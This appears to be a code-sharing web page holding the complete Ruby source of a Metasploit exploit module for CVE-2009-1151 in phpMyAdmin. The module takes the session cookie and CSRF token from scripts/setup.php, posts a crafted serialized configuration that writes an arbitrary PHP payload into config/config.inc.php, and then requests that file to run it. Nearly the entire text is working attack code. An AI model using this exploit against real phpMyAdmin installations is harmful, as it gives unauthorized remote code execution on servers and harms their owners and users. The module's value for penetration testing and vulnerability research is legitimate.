扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 |
## # $Id: phpmyadmin_config.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PhpMyAdmin Config File Code Injection', 'Description'=> %q{ This module exploits a vulnerability in PhpMyAdmin's setup feature which allows an attacker to inject arbitrary PHP code into a configuration file. The original advisory says the vulnerability is present in phpMyAdmin versions 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on 3.0.1.1. The file where our payload is written (phpMyAdmin/config/config.inc.php) is not directly used by the system, so it may be a good idea to either delete it or copy the running config (phpMyAdmin/config.inc.php) over it after successful exploitation. }, 'Author' => [ 'Greg Ose', # Discovery 'pagvac', # milw0rm PoC 'egypt' # metasploit module ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 9669 $', 'References' => [ [ 'CVE', '2009-1151' ], [ 'OSVDB', '53076' ], [ 'URL', 'http://www.milw0rm.com/exploits/8921' ], [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php' ], [ 'URL', 'http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload'=> { 'Space' => 4000, # unlimited really since our shellcode gets written to a file 'DisableNops' => true, # No filtering whatsoever, so no badchars 'Compat'=> { 'ConnectionType' => 'find', }, 'Keys'=> ['php'], }, 'Targets'=> [ [ 'Automatic (phpMyAdmin 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1)', { } ], ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Mar 24 2009')) register_options( [ OptString.new('URI', [ true,"Base phpMyAdmin directory path", '/phpMyAdmin/']), ], self.class) end def exploit # First, grab the session cookie and the CSRF token print_status("Grabbing session cookie and CSRF token") uri = datastore['URI'] + "scripts/setup.php" response = send_request_raw({ 'uri' => uri}) if !response raise RuntimeError.new("Server did not respond to our initial request") return end if (response.body !~ /"token"\s*value="([^"]*)"/) raise RuntimeError.new("Couldn't find token and can't continue without it. Is URI set correctly?") return end token = $1 cookie = response["Set-Cookie"] # There is probably a great deal of randomization that can be done with # this format. config = "a:1:{s:7:\"Servers\";a:1:{i:0;a:6:{s:#{payload.encoded.length + 13}:\"" config << "host']='';" + payload.encoded + ";//" config << '";s:9:"' + rand_text_alpha(9) + '";s:9:"extension";s:6:"mysqli";s:12:"connect_type"' config << ';s:3:"tcp";s:8:"compress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"' + rand_text_alpha(4) + '";}}}' data = "token=#{token}&action=save&configuration=" data << Rex::Text.uri_encode(config) data << "&eoltype=unix" # Now that we've got the cookie and token, send the evil print_status("Sending save request") response = send_request_raw({ 'uri' => datastore['URI'] + "/scripts/setup.php", 'method'=> 'POST', 'data'=> data, 'cookie'=> cookie, 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Length' => data.length } }, 3) print_status("Requesting our payload") # very short timeout because the request may never return if we're # sending a socket payload timeout = 0.1 response = send_request_raw({ # Allow findsock payloads to work 'global' => true, 'uri' => datastore['URI'] + "/config/config.inc.php" }, timeout) handler end end |
体验盒子
